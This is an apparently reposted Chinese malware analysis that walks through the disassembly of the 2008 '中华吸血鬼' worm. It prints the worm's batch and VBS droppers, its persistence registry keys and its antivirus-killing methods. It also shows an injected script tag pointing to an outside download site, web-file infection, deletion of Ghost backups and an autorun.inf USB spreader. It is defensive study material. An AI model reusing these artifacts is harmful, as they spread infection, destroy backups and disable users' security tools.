PS:出自之前收藏的文章,中华吸血鬼这个病毒已经是08年的,距今已经有4年之久,不过很多分析还是值得学习和借鉴的。
“中华吸血鬼”是个蠕虫病毒,病毒通过U盘、局域网弱密码猜解、网页挂马、dll劫持等方式传播。该病毒会在%systemroot%/Tasks/ 中释放多个病毒文件,通过修改注册表键值实现开机自动启动,为了躲避杀毒软件查杀,该病毒还会关闭破坏多种主流杀毒软件和安全工具,并且会屏蔽常见安全网站。病毒会每隔360000ms下载一次新病毒到本地运行,达到其不断更新的目的,还会删除Windows目录中help下的所有文件,电脑一旦感染此病毒,可能会给系统带来很大安全威胁。带着学习和过招的态度,我找到了吸血鬼2.1病毒样本,并对它探个究竟。
首先用PEiD对病毒样本unpacked.exe查壳,发现该病毒没有加壳,如图所示:
用OD载入,单步执行,直到oep处。
00405FF8 call 00402E2000402E20 push ebx
00402E21 push esi
00402E22 push edi
00402E23 push 00401F14 ;中华吸血鬼2.1
00402E28 xor esi, esi
00402E2A push 1
00402E2C push esi
00402E2D call dword ptr [<&KERNEL32.CreateMute>; \CreateMutexA00402E4F push ebp
00402E50 push 00401EA8 ; /Subkey = "SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}"
00402E55 push 80000001 ; |hKey = HKEY_CURRENT_USER
00402E5A call dword ptr [<&ADVAPI32.RegDeleteK>; \RegDeleteKeyA
线程一:00403278处
创建一个进程快照:
00403290 mov esi, 00401FF0 ; ASCII "360tray.exe"
00403295 lea edi, dword ptr [ebp-20]
00403298 mov dword ptr [ebp-C], eax
0040329B mov eax, dword ptr [402000]
004032A0 push 0 ; /ProcessID = 0
004032A2 movs dword ptr es:[edi], dword ptr [e>; |
004032A3 mov dword ptr [ebp-8], eax ; |
004032A6 mov eax, dword ptr [401FE8] ; |
004032AB movs dword ptr es:[edi], dword ptr [e>; |
004032AC mov dword ptr [ebp-14], eax ; |
004032AF mov eax, dword ptr [401FEC] ; |
004032B4 push 2 ; |Flags = TH32CS_SNAPPROCESS
004032B6 mov dword ptr [ebp-10], eax ; |
004032B9 movs dword ptr es:[edi], dword ptr [e>; |
004032BA call <jmp.&KERNEL32.CreateToolhelp32S>; \CreateToolhelp32Snapshot
得到快照句柄后,调用Process32First和Process32Next函数遍历进程:
004032CE mov edi, eax
004032D0 push edi ; /lppe
004032D1 push dword ptr [ebp-4] ; |hSnapshot
004032D4 mov dword ptr [edi], esi ; |
004032D6 call <jmp.&KERNEL32.Process32First> ; \Process32First
004032DB push edi ; /lppe
004032DC push dword ptr [ebp-4] ; |hSnapshot
004032DF call <jmp.&KERNEL32.Process32Next> ; \Process32Next
将得到的进程名与360tray.exe、ast.exe、AST.exe进行比较,当匹配时调用TerminateProcess来结束程序。线程二:004030B6处
获取系统目录:
00403134 push esi ; /BufSize => 104 (260.)
00403135 push eax ; |Buffer
00403136 call dword ptr [<&KERNEL32.GetWindowsDirectoryA>] ; \GetWindowsDirectoryA
0040313C lea eax, dword ptr [ebp-30C]
00403142 push esi ; /BufSize => 104 (260.)
00403143 push eax ; |PathBuffer
00403144 push 0 ; |hModule = NULL
00403146 call dword ptr [<&KERNEL32.GetModuleFileNameA>] ; \GetModuleFileNameA
之后执行一个子函数调用00403043,功能是将病毒文件内容写入到csrss.exe中
00403043 push ebp
......
0040304E push 00401F90 ; /mode = "rb"
00403053 push dword ptr [ebp+8] ; |path = "C:\Documents and Settings\li\中华吸血鬼2.2\unpacked.exe"
00403056 call <jmp.&MSVCRT.fopen> ; \fopen
0040305B mov esi, eax
0040305D pop ecx
0040305 test esi, esi
00403060 pop ecx
00403061 je short 004030B2
00403063 push 00401F8C ; /mode = "wb"
00403068 push dword ptr [ebp+C] ; |path = "C:\WINDOWS\Tasks\csrss.exe"
0040306B call <jmp.&MSVCRT.fopen> ; \fopen
00403070 mov ebx, eax
00403072 pop ecx
00403073 test ebx, ebx
00403075 pop ecx
00403076 je short 004030B2
00403078 test byte ptr [esi+C], 10
0040307C push esi ; /stream=MSVCT.77C2FCE0
0040307D jnz short 004030A5 ; |
0040307F push 1 ; |n = 1
00403081 lea eax, dword ptr [ebp-104] ; |eax=00EEF778
00403087 push 1 ; |size = 1
00403089 push eax ; |ptr
0040308A call <jmp.&MSVCRT.fread> ; \fread
0040308F push ebx ; /stream
00403090 push 1 ; |n = 1
00403092 lea eax, dword ptr [ebp-104] ; |
00403098 push 1 ; |size = 1
0040309A push eax ; |ptr
0040309B call <jmp.&MSVCRT.fwrite> ; \fwrite
004030A0 add esp, 20
004030A3 jmp short 00403078
004030A5 call <jmp.&MSVCRT.fclose> ; \fclose
004030AA push ebx ; /stream
004030AB call <jmp.&MSVCRT.fclose> ; \fclose
得到系统目录路径后,向目录中创建killme.bat批处理,写入信息,
00403212 push 00401FBC ; /mode = "w"
00403217 push 00401FC4 ; |path = "c:\killme.bat"
0040321C call <jmp.&MSVCRT.fopen> ; \fopen
00403221 mov esi, eax
00403223 lea eax, dword ptr [ebp-410]
00403229 push eax ; /<%s>
0040322A lea eax, dword ptr [ebp-30C] ; |
00403230 push eax ; |<%s>
00403231 lea eax, dword ptr [ebp-71C] ; |
00403237 push 00401F94 ; |format = "ipconfig",CR,LF,"del ""%s""",CR,LF,"start %s",CR,LF,"del %%0"
0040323C push eax ; |s
0040323D call <jmp.&MSVCRT.sprintf> ; \sprintf
00403242 lea eax, dword ptr [ebp-71C]
00403248 push esi ; /stream
00403249 push eax ; |s
0040324A call <jmp.&MSVCRT.fputs> ; \fputs
0040324F push esi ; /stream
00403250 call <jmp.&MSVCRT.fclose> ; \fclose
Killme.bat内容:
ipconfig
del "C:\Documents and Settings\li\桌面\中华吸血鬼2.2\unpacked.exe"
start C:\WINDOWS\Tasks\csrss.exe
del %0
调用WinExec隐蔽执行Killme.bat,删除unpacked.exe,并且启动csrss.exe,并且csrss.exe是在到系统任务中,达到开机自启动的目的。线程三:004033AC处
跳到004033AC处,首先获得PostMessageA的地址,然后调用Sleep函数休眠3s。接下来调用GetCursorPos获得光标所在位置的坐标,接着调用WindowFromPoint来获得光标坐标的窗口句柄。
004033FA push eax ; /pPoint 存取坐标的结构体
004033FB call dword ptr [<&USER32.GetCursorPos>; \GetCursorPos
00403401 push dword ptr [ebp-8] ; /pt.Y
00403404 push dword ptr [ebp-C] ; |pt.X
00403407 call dword ptr [<&USER32.WindowFromPo>; \WindowFromPoint
接下来调用GetWindowTextA函数来获取窗口标题
00403447 push 104 ; /Count = 104 (260.)
0040344 push eax ; |Buffer
0040344D push edi ; |hWnd
0040344E call dword ptr [<&USER32.GetWindowTextA>] ; \GetWindowTextA
如果桌面上窗口标题是: 杀毒、worm、卡巴斯基、超级巡警、江民、金山、Anti、
Anti、Virus、virus、Firewall、检测、Mcafee.、病毒、查杀、狙剑、防火墙、主动防御、微点、防御、系统保护、绿鹰、木马、上报、举报、瑞星、进程、系统安全、Process.、NOD32、专杀安全卫士,
00403490 push 004021E0 ; /s2 = "NOD32"
00403495 push eax ; |s1
00403496 call <jmp.&MSVCRT.strstr> ; \strstr
如果是就结束掉,结束不掉的话一直弹出一个警告知道这些软件被关掉
004037CE push eax ; /<%s>
004037C lea eax, dword ptr [ebp-110] ; |
004037D5 push eax ; |<%s>
004037D6 lea eax, dword ptr [ebp-318] ; |
004037DC push 00402014 ; |format = 安全提示:您正在使用的%s%s是盗版软件,可能您是盗版软件的受害者,为了给用户提供保证,我们无法继续给您提供服务,请到指定销售商店购买我们的正版软件,如果有任何疑问,请到我们微软主页查看http://www.microsoft.com
004037E1 push eax ; |s
004037E2 call <jmp.&MSVCRT.sprintf> ; \sprintf
004037E7 add esp, 10
004037EA lea eax, dword ptr [ebp-318]
004037F0 push 10 ; /Style = MB_OK|MB_ICONHAND|MB_APPLMODAL
004037F2 push 00402004 ; |Title = "windows盗版验证"
004037F7 push eax ; |Text
004037F8 push ebx ; |hOwner
004037F9 call dword ptr [<&USER32.MessageBoxA>>; \MessageBoxA线程四:00405E10处
跳到00405E10处,此处是一小段数据,在00405E3C处才是源代码,原来这个线程是用来专门对抗冰刃的,通过FindWindowExA得到当前正在工作的窗口的句柄
00405E43 call esi ; [GetForegroundWindow;返回前台窗口的句柄
00405E45 push dword ptr [ebp+C] ; /Title = "";窗口标题
00405E48 xor ebx, ebx ; |
00405E4A mov edi, eax ; |保存窗口句柄
00405E4C push dword ptr [ebp+8] ; |Class = "AfxControlBar42s";指定类名
00405E4F push ebx ; |hAfterWnd => NULL;子窗口句柄
00405E50 push edi ; |hParent;父窗口句柄
00405E51 call dword ptr [<&USER32.FindWindowEx>; \FindWindowExA;获取一个窗口的句柄
发现标题是跟冰刃有关的,就调用PostMessageA发送WM_CLOSE来结束冰刃。
00405E5B push ebx ; /lParam => 0
00405E5C push ebx ; |wParam => 0
00405E5D push 10 ; |Message = WM_CLOSE
00405E5F push edi ; |hWnd
00405E60 call dword ptr [<&USER32.PostMessageA>] ; \PostMessageA
仅仅发送WM_CLOSE是不能结束掉冰刃的,冰刃会弹出一个是否结束冰刃的对话框。于是病毒就采用下面的方法来模拟按键Enter。
00405E9B push ebx ; /ExtraInfo => 0
00405E9C push ebx ; |Flags => 0
00405E9D push ebx ; |ScanCode => 0
00405E9E push 0D ; |Key = VK_RETURN ;Enter键相关的击键值
00405EA0 call dword ptr [<&USER32.keybd_event>] ; \keybd_event
该方法比较新颖,使用keybd_event模拟Enter键并结束掉冰刃,值得学习。线程五:00405CE0处
删除HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings键,SOFTWARE\Microsoft\ActiveSetup\InstalledComponents\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}键:
00405D1D push 00402D1C ; ASCII"SOFTWARE\Microsoft\Windows Script Host\Settings"
00405D22 rep stos dword ptr es:[edi]
00405D24 push esi
00405D25 call ebx ; ADVAPI32.RegDeleteKeyA
00405D27 mov edi, 00401EA8 ; ASCII "SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}"
00405D2C push edi
00405D2D push 80000001
00405D32 call ebx ; ADVAPI32.RegDeleteKeyA
然后又创建[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}]键,指向<系统设置><%windir%\Tasks\hackshen.vbs>,
00405D37 push eax ; /pHandle = 010EFFB0
00405D38 push edi ; |Subkey = "SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}"
00405D39 push esi ; |hKey = HKEY_LOCAL_MACHINE
00405D3A call dword ptr [<&ADVAPI32.RegCreateK>; \RegCreateKeyA
00405D40 mov edx, 00402D10
00405D45 or ecx, FFFFFFFF
00405D48 mov edi, edx
00405D4A xor eax, eax
00405D4C repne scas byte ptr es:[edi]
00405D4E not ecx
00405D50 dec ecx
00405D51 push ecx ; /Length=8
00405D52 push edx ; |Value => "系统设置"
00405D53 push 1 ; |ValueType = REG_SZ
00405D55 push eax ; |Subkey => NULL
00405D56 push dword ptr [ebp-4] ; |hKey=64
00405D59 call dword ptr [<&ADVAPI32.RegSetValu>; \RegSetValueA设置键值
00405D5F lea eax, dword ptr [ebp-104]
00405D65 push eax ; /String
00405D66 call dword ptr [<&KERNEL32.lstrlenA>] ; \lstrlenA
00405D6C push eax ; /BufSize=27
00405D6D lea eax, dword ptr [ebp-104] ; |
00405D73 push eax ; |Buffer=
00405D74 push 2 ; |ValueType = REG_EXPAND_SZ
00405D76 push 0 ; |Reserved = 0
00405D78 push 00402D04 ; |ValueName = "stubpath"
00405D7D push dword ptr [ebp-4] ; |hKey=64
00405D80 call dword ptr [<&ADVAPI32.RegSetValu>; \RegSetValueExA
00405D86 push dword ptr [ebp-4] ; /hKey
00405D89 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
00405D8F lea eax, dword ptr [ebp-208]
00405D95 push 104 ; /BufSize = 104 (260.)
00405D9A push eax ; |Buffer
00405D9B call dword ptr [<&KERNEL32.GetWindows>; \GetWindowsDirectoryA获取系统目录
00405DA1 mov edi, 00402CF0 ; ASCII "\Tasks\hackshen.vbs"
00405DA6 or ecx, FFFFFFFF
00405DA9 xor eax, eax ;清零,用于计算字符串长度
00405DAB lea edx, dword ptr [ebp-208]
00405DB1 repne scas byte ptr es:[edi] ;扫描字符串知道匹配eax=0时停止
00405DB3 not ecx ;得到字符串的长度
00405DB5 sub edi, ecx
00405DB7 push 00401FBC ; /mode = "w"
00405DBC mov esi, edi ; |esi指向ASCII "\Tasks\hackshen.vbs"
00405DBE mov edi, edx ; |edi指向 ASCII"C:\Windows"
00405DC0 mov edx, ecx ; |将字符串长度保存
00405DC2 or ecx, FFFFFFFF ; |ecx=FFFFFFFF
00405DC5 repne scas byte ptr es:[edi] ; |扫描字符串知道匹配eax=0时停止
00405DC7 mov ecx, edx ; |将字符串长度回写
00405DC9 dec edi ; |
00405DCA shr ecx, 2 ; |字符串长度除4
00405DCD rep movs dword ptr es:[edi], dword ptr es:[esi]>; |按双字将esi所指的内容移到edi所指的地址后,即将ASCII "\Tasks\hackshen.vbs"移到ASCII"C:\Windows"后
00405DCF mov ecx, edx ; |
00405DD1 lea eax, dword ptr [ebp-208] ; |
00405DD7 and ecx, 3 ; |ecx清零
00405DDA push eax ; |path = "C:\WINDOWS\Tasks\hackshen.vbs"
00405DDB rep movs byte ptr es:[edi], byte ptr>; |
00405DDD call <jmp.&MSVCRT.fopen> ; \fopen
0405DE40 push 00402C8C ; /format = "On Error Resume Next",CR,LF,"Set rs=createObject(""Wscript.shell"")",CR,LF,"rs.run ""%%windir%%\Tasks\csrss.exe"",0"
00405DE9 lea eax, dword ptr [ebp-30C] ; |
00405DEF push eax ; |s
00405DF0 call <jmp.&MSVCRT.sprintf> ; \sprintf
00405DF5 lea eax, dword ptr [ebp-30C]
00405DFB push esi ; /stream
00405DFC push eax ; |s
00405DFD call <jmp.&MSVCRT.fputs> ; \fputs
00405E02 push esi ; /stream
00405E03 call <jmp.&MSVCRT.fclose> ; \fclose
vbs内容如下:
On Error Resume Next
Set rs=createObject("Wscript.shell")
rs.run "%%windir%%\Tasks\csrss.exe"。线程六:00403BC5处
每隔2s创建一个线程,线程函数指向00403B92处,线程函数创建一个HDM的互斥量,然后调用004039AC子函数
00403BC5 push esi
00403BC6 xor esi, esi
00403BC8 push 7D0 ; /Timeout = 2000. ms
00403BCD call dword ptr [<&KERNEL32.Sleep>] ; \Sleep休眠两秒
00403BD3 push esi ; /pThreadId=NULL
00403BD4 push esi ; |CreationFlags=0
00403BD5 push esi ; |pThreadParm=NULL
00403BD6 push 00403B92 ; |ThreadFunction = unpacked.00403B92
00403BDB push esi ; |StackSize=0
00403BDC push esi ; |pSecurity=NULL
00403BDD call dword ptr [<&KERNEL32.CreateThread>] ; \CreateThread创建一个线程
线程函数:
00403B92 push 00402204 ; /MutexName = "HDM"
00403B97 push 1 ; |InitialOwner = TRUE
00403B99 push 0 ; |pSecurity = NULL
00403B9B call dword ptr [<&KERNEL32.CreateMutexA>] ; \CreateMutexA
00403BA1 call dword ptr [<&KERNEL32.GetLastError>] ; [GetLastError
00403BA7 cmp eax, 0B7
00403BAC jnz short 00403BB3
00403BAE xor eax, eax
00403BB0 retn 4
004039B5 push ebx
004039B6 push esi
004039B7 push edi
004039B8 call 00403804 ;获取#32770类名的窗口句柄
004039BD mov esi, dword ptr [<&USER32.IsWindow>] ; USER32.IsWindow确定给定的窗口句柄是否标识一个已存在的窗口
004039C3 mov edi, eax
004039C5 push edi ; /hWnd
004039C6 call esi ; \IsWindow
004039D0 push edi
004039D1 call 00403900 ;列举子窗口
{
00403900 push 50011004
00403905 push 37E
0040390A push dword ptr [esp+C]
0040390E call 004038CF
{
......
004038EA push eax ; /lParam
004038EB push 00403898 ; |Callback = unpacked.00403898
004038F0 push dword ptr [ebp+8] ; |hParent
004038F3 call dword ptr [<&USER32.EnumChildWindows>>; \EnumChildWindows枚举一个父窗口的所有子窗口
004038F9 mov eax, dword ptr [406060]
004038FE leave
004038FF retn
}
00403913 add esp, 0C
00403916 retn
}
......
00403AF1 push -1 ; /lParam = FFFFFFFF
00403AF3 mov edi, 0B1 ; |
00403AF8 push ebx ; |wParam
00403AF9 push edi ; |Message => EM_SETSEL
00403AFA push dword ptr [ebp-4] ; |hWnd
00403AFD call esi ; \SendMessageA
......
00403B81 push ebx ; /lParam
00403B82 push ebx ; |wParam
00403B83 push 0C2 ; |Message = EM_REPLACESEL
00403B88 push dword ptr [ebp-4] ; |hWnd
00403B8B call esi ; \SendMessageA
如果类名为#32770的窗口,并且试图发送消息(什么消息没试验出来)给对方(应该是通过QQ之类的聊天工具传播)。线程七:00403FBA处
调用GetLogicalDrvieStringsA函数获取一个字串,其中包含了当前所有逻辑驱动器的根驱动器路径,调用FindFirstFileA和FindNextFileA函数来循环查找D盘开始的所有盘符中的文件
00403FEF push eax ; /Buffer = 012EFEB0
00403FF0 push 100 ; |BufSize = 100 (256.)
00403FF5 call dword ptr [<&KERNEL32.GetLogicalDriveStrings>; \GetLogicalDriveStringsA
00403FFB mov ebx, eax ;返回值保存到ebx,调用成功保存得到字符串的长度
00403FFD xor esi, esi ;esi清零
00403FFF test ebx, ebx ;测试返回值
00404001 jle short 00404054 ;如果为0,即不成功,退出
00404003 mov edi, dword ptr [<&KERNEL32.lstrc>; kernel32.lstrcmpA
00404009 cmp byte ptr [ebp+esi-104], 0 ;比较是否为空来得到驱动器盘符
00404011 jnz short 0040404F
00404013 mov al, byte ptr [ebp+esi-107] ;将A赋值给al
0040401A push 00402264 ; ASCII "A:"
0040401F mov byte ptr [ebp-4], al ;将A保存
00404022 mov al, byte ptr [ebp+esi-106] ;将:赋值给al
00404029 mov byte ptr [ebp-3], al ;将:添加到A后
0040402C lea eax, dword ptr [ebp-4]
0040402F push eax
00404030 call edi ;lstrcmpA比较是否为A:
00404032 test eax, eax ;测试返回值
00404034 je short 0040404F ;是的话继续获取后面的驱动器盘符
00404036 lea eax, dword ptr [ebp-4] ;不是的话和C:进行比较
00404039 push 00402260 ; ASCII "C:"
0040403E push eax
0040403F call edi ;lstrcmpA
00404041 test eax, eax ;测试返回值
00404043 je short 0040404F ;相等的话继续获取后面的驱动器盘符
00404045 lea eax, dword ptr [ebp-4] ;不相等的话开始调用子函数
00404048 push eax
00404049 call 00403C13
{
00403C13 push ebp
......
00403C33 push dword ptr [ebp+8] ; /String2=D:
00403C36 mov ebx, dword ptr [<&KERNEL32.lstrc>; |kernel32.lstrcpyA
00403C3C stos word ptr es:[edi] ; |
00403C3E stos byte ptr es:[edi] ; |
00403C3F lea eax, dword ptr [ebp-34C] ; |
00403C45 push eax ; |String1
00403C46 call ebx ; \lstrcpyA
00403C48 mov esi, dword ptr [<&KERNEL32.lstrc>; kernel32.lstrcatA
00403C4E lea eax, dword ptr [ebp-34C]
00403C54 push 0040224C ; /StringToAdd = "\*.*" 通配符
00403C59 push eax ; |ConcatString=D:
00403C5A call esi ; \lstrcatA连接字符串
......
00403C62 push eax ; /pFindFileData
00403C63 lea eax, dword ptr [ebp-34C] ; |
00403C69 push eax ; |FileName=D:\*.*
00403C6A call dword ptr [<&KERNEL32.FindFirstFileA>] ; \FindFirstFileA
00403C70 cmp eax, -1
00403C73 mov dword ptr [ebp-4], eax
00403C76 jnz short 00403C7F
00403C78 xor eax, eax
00403C7A jmp 00403EC3
00403C7F lea ecx, dword ptr [ebp-248]
00403C85 push ecx ; /pFindFileData
00403C86 push eax ; |hFile
00403C87 call dword ptr [<&KERNEL32.FindNextFileA>] ; \FindNextFileA
其中调用403BE5和403BFC两个子函数,都是提取文件名后缀的函数,
00403BFC mov edx, dword ptr [esp+4]
00403C00 push edi ; lstrcmpA
00403C01 mov edi, edx ; D:\BOOTFONT.BIN
00403C03 or ecx, FFFFFFFF ;ecx=FFFFFFFF
00403C06 xor eax, eax ;eax清零
00403C08 repne scas byte ptr es:[edi] ;扫描字符串直到遇到空为止
00403C0A not ecx ;得到字符串的长度
00403C0C dec ecx
00403C0D pop edi ;lstrcmpA
00403C0E lea eax, dword ptr [ecx+edx-4] ;.BIN
00403C12 retn
如果后缀名是html,HTML,htm,HTM,asp,aspx,php,jsp的话,就写入"<script language=""javascript"" src=""http://www.liuliangvip.cn/down/index.htm""></script>",这样当每次打开这些文件时,会自动连接到http://www.liuliangvip.cn/down/index.htm这个网站。如果不是的话就检查后缀名是gho,GHO,Gho的文件,是的话就删除掉,使用户不能通过ghost文件来恢复系统,这招够毒的。线程八:00404241处
有两处跳转:0040405E和0040422A
00404241 . E8 18FEFFFF call 0040405E
00404246 . E8 DFFFFFFF call 0040422A
0040424B . 33C0 xor eax, eax
0040424D . C2 0400 retn 4
0040405E:调用GetModuleFileName获得装载病毒文件的完整路径
0040405E /$ 68 04010000 push 104 ; /BufSize = 104 (260.)
00404063 |. 68 0C764000 push 0040760C ; |PathBuffer = unpacked.0040760C
00404068 |. 6A 00 push 0 ; |hModule = NULL
0040406A |. FF15 20104000 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00404070 \. C3 retn
查看数据面板,可以看到路径,
0040422A:每隔1s重新调用00404071
0040422A /$ E8 42FEFFFF /call 00404071
0040422F |. 85C0 |test eax, eax
00404231 |. 75 0D |jnz short 00404240
00404233 |. 68 E8030000 |push 3E8 ; /Timeout = 1000. ms
00404238 |. FF15 AC104000 |call dword ptr [<&KERNEL32.Sleep>] ; \Sleep休眠1s
0040423E |.^ EB EA \jmp short 0040422A
00404240 \> C3 retn
00404071:调用GetLogicalDrives,再调用GetDriveType来获得逻辑驱动器的属性,
004040BC |. 53 |push ebx ; /RootPathName=C:\
004040BD |. 8BF7 |mov esi, edi ; |
004040BF |. 8BD1 |mov edx, ecx ; |
004040C1 |. 8BFB |mov edi, ebx ; |
004040C3 |. 83C9 FF |or ecx, FFFFFFFF ; |
004040C6 |. F2:AE |repne scas byte ptr es:[edi] ; |
004040C8 |. 8BCA |mov ecx, edx ; |
004040CA |. 4F |dec edi ; |
004040CB |. C1E9 02 |shr ecx, 2 ; |
004040CE |. F3:A5 |rep movs dword ptr es:[edi], dword >; |
004040D0 |. 8BCA |mov ecx, edx ; |
004040D2 |. 83E1 03 |and ecx, 3 ; |
004040D5 |. F3:A4 |rep movs byte ptr es:[edi], byte pt>; |
004040D7 |. FF15 50104000 |call dword ptr [<&KERNEL32.GetDriveT>; \GetDriveTypeA获取盘符属性
004040DD |. 83F8 02 |cmp eax, 2 ;比较是否为可移动磁盘
004040E0 74 14 jne short 004040F6 ;不是的话继续查看后面的盘符
004040E2 |. 33C0 |xor eax, eax
004040E4 |. 50 |push eax ; /pFileSystemNameSize => NULL
004040E5 |. 50 |push eax ; |pFileSystemNameBuffer => NULL
004040E6 |. 50 |push eax ; |pFileSystemFlags => NULL
004040E7 |. 50 |push eax ; |pMaxFilenameLength => NULL
004040E8 |. 50 |push eax ; |pVolumeSerialNumber => NULL
004040E9 |. 50 |push eax ; |MaxVolumeNameSize => 0
004040EA |. 50 |push eax ; |VolumeNameBuffer => NULL
004040EB |. 53 |push ebx ; |RootPathName=C:\
004040EC |. FF15 4C104000 |call dword ptr [<&KERNEL32.GetVolume>; \GetVolumeInformationA获取磁盘信息
如果是可移动磁盘的话,又有00404164和004042E6两处跳转
00404164::
......
0040416D |. 6A 00 push 0 ; /timer = NULL
0040416F |. E8 9A1D0000 call <jmp.&MSVCRT.time> ; \time
00404174 |. 50 push eax ; /seed
00404175 |. E8 8E1D0000 call <jmp.&MSVCRT.srand> ; \srand设置时间因子
0040417A |. 8065 F4 00 and byte ptr [ebp-C], 0
0040417E |. 33C0 xor eax, eax
00404180 |. 8D7D F5 lea edi, dword ptr [ebp-B]
00404183 |. 59 pop ecx
00404184 |. AB stos dword ptr es:[edi]
00404185 |. AB stos dword ptr es:[edi]
00404186 |. 59 pop ecx
00404187 |. 33F6 xor esi, esi
00404189 |. 66:AB stos word ptr es:[edi]
0040418B |> E8 721D0000 /call <jmp.&MSVCRT.rand> ; [rand产生随机数
00404190 |. 6A 3E |push 3E
00404192 |. 33D2 |xor edx, edx
00404194 |. 59 |pop ecx
00404195 |. F7F1 |div ecx
00404197 |. 46 |inc esi
00404198 |. 83FE 0A |cmp esi, 0A ;重复10次
0040419B |. 8A82 902D4000 |mov al, byte ptr [edx+402D90]
004041A1 |. 884435 F3 |mov byte ptr [ebp+esi-D], al
004041A5 |.^ 7C E4 \jl short 0040418B
......
如果存在.autorun.inf这个文件夹,就把文件夹名用一个随机名字替换,如果没有的话生成autorun.inf文件,设置成只读、隐藏、系统属性
004041F4 |. 53 push ebx ; /FileName => "C:\autorun.inf"
004041F5 |. FF15 A8104000 call dword ptr [<&KERNEL32.GetFileAtt>; \GetFileAttributesA获取文件属性
004041FB |. 83F8 10 cmp eax, 10 ;比较看是否是文件夹
004041FE |. 75 0A jnz short 0040420A ;不是的话跳转,打开文件
00404200 |. 57 push edi ; /NewName => "C:\FV5Jz39xs0"
00404201 |. 53 push ebx ; |ExistingName => "C:\autorun.inf"
00404202 |. FF15 5C104000 call dword ptr [<&KERNEL32.MoveFileA>>; \MoveFileA是的话将文件名改成C:\FV5Jz39xs0
00404208 |. EB 1B jmp short 00404225
0040420A |> E8 27FFFFFF call 00404136
0040420F |. 68 70224000 push 00402270 ; /mode = "r"
00404214 |. 53 push ebx ; |path
00404215 |. E8 BE1C0000 call <jmp.&MSVCRT.fopen> ; \fopen
......
004042D9 |. 6A 07 push 7 ; /FileAttributes = READONLY|HIDDEN|SYSTEM
004042DB |. 53 push ebx ; |FileName
004042DC |. FF15 58104000 call dword ptr [<&KERNEL32.SetFileAtt>; \SetFileAttributesA设置成只读,隐藏,系统属性
autorun文件内容如下:
[autorun]
OPEN=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\GHOSTBAK.exe
shell\open=打开(&O)
shell\open\Command=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\GHOSTBAK.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\GHOSTBAK.exe
004042E6:创建"recycle.{645FF040-5081-101B-9F08-00AA002F954E}"这个新目录,这个目录的图标是回收站的图标,将病毒文件复制到该文件夹里,改名为GHOSTBAK.exe,诱使用户点击,使病毒文件执行。
004042E6 /$ 81EC 04010000 sub esp, 104
004042EC |. 53 push ebx
004042ED |. 55 push ebp
004042EE |. 8B2D 44104000 mov ebp, dword ptr [<&KERNEL32.lstrc>; kernel32.lstrcatA
004042F4 |. 56 push esi
004042F5 |. 57 push edi
004042F6 |. BB 64734000 mov ebx, 00407364 ; ASCII "C:\"
004042FB |. 68 30234000 push 00402330 ; /StringToAdd = "recycle.{645FF040-5081-101B-9F08-00AA002F954E}"
00404300 |. 53 push ebx ; |ConcatString => "C:\"
00404301 |. FFD5 call ebp ; \lstrcatA
00404303 |. 6A 00 push 0 ; /pSecurity = NULL
00404305 |. 53 push ebx ; |Path => "C:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}"
00404306 |. FF15 68104000 call dword ptr [<&KERNEL32.CreateDire>; \CreateDirectoryA创建目录
0040430C |. 8D4424 10 lea eax, dword ptr [esp+10]
00404310 |. 53 push ebx ; /String2 => "C:\"
00404311 |. 50 push eax ; |String1
00404312 |. FF15 2C104000 call dword ptr [<&KERNEL32.lstrcpyA>] ; \lstrcpyA
00404318 |. 8D4424 10 lea eax, dword ptr [esp+10]
0040431C |. 68 20234000 push 00402320 ; /StringToAdd = "\中",BB,"?.//"
00404321 |. 50 push eax ; |ConcatString
00404322 |. FFD5 call ebp ; \lstrcatA
00404324 |. 8BFB mov edi, ebx
00404326 |. 83C9 FF or ecx, FFFFFFFF
00404329 |. 33C0 xor eax, eax
0040432B |. 68 10234000 push 00402310 ; /StringToAdd = "\GHOSTBAK.exe"
00404330 |. F2:AE repne scas byte ptr es:[edi] ; |
00404332 |. F7D1 not ecx ; |
00404334 |. 2BF9 sub edi, ecx ; |
00404336 |. B8 08754000 mov eax, 00407508 ; |
0040433B |. 8BD1 mov edx, ecx ; |
0040433D |. 8BF7 mov esi, edi ; |
0040433F |. 8BF8 mov edi, eax ; |
00404341 |. 50 push eax ; |ConcatString => ""
00404342 |. C1E9 02 shr ecx, 2 ; |
00404345 |. F3:A5 rep movs dword ptr es:[edi], dword p>; |
00404347 |. 8BCA mov ecx, edx ; |
00404349 |. 83E1 03 and ecx, 3 ; |
0040434C |. F3:A4 rep movs byte ptr es:[edi], byte ptr>; |
0040434E |. FFD5 call ebp ; \lstrcatA
00404350 |. 6A 00 push 0 ; /FailIfExists = FALSE
00404352 |. 68 08754000 push 00407508 ; |NewFileName = "C:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\GHOSTBAK.exe"
00404357 |. 68 0C764000 push 0040760C ; |ExistingFileName = "C:\Documents and Settings\li\中华吸血鬼2.2\unpacked.exe"
0040435C |. FF15 64104000 call dword ptr [<&KERNEL32.CopyFileA>>; \CopyFileA将病毒文件复制到该文件夹下,并改名
00404362 |. 6A 07 push 7 ; /FileAttributes = READONLY|HIDDEN|SYSTEM
00404364 |. 53 push ebx ; |FileName = "C:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}"
00404365 |. FF15 58104000 call dword ptr [<&KERNEL32.SetFileAtt>; \SetFileAttributesA设置文件夹属性为只读,隐藏,系统
0040436B |. 8D4424 10 lea eax, dword ptr [esp+10]
0040436F |. 6A 00 push 0 ; /pSecurity = NULL
